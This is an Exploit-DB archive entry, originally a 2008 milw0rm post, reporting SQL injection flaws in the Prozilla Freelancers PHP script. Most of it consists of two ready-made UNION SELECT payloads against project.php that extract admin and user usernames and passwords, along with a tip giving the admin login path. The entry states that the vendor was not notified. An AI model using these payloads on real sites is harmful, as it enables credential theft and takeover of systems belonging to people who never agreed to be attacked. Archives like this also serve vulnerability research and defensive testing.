exploit-db-mirror/exploits/php/webapps/5390.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

38 lines
No EOL
1.3 KiB
Text

--==+================================================================================+==--
--==+ Prozilla Freelancers SQL Injection Vulnerabilitys +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 7 April 2008
Script Download: http://prozilla.net
DORK: N/A
Vendor Has Not Been Notified!
DESCRIPTION:
Prozilla freelancers is vulnerable due to a insecure mysql query.
this allows the remote attacker to pull admin/user credntials from database.
and possibly gain shell.
SQL Injection:
ADMIN: project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/admin/*
USERS: project.php?project=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,CONCAT(username,0x3a,password),11,12,13,14,15/**/FROM/**/users/**/LIMIT/**/0,1/*
NOTE/TIP:
admin login is at /siteadmin/
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
--==+================================================================================+==--
--==+ Prozilla Freelancers SQL Injection Vulnerabilitys +==--
--==+================================================================================+==--
# milw0rm.com [2008-04-07]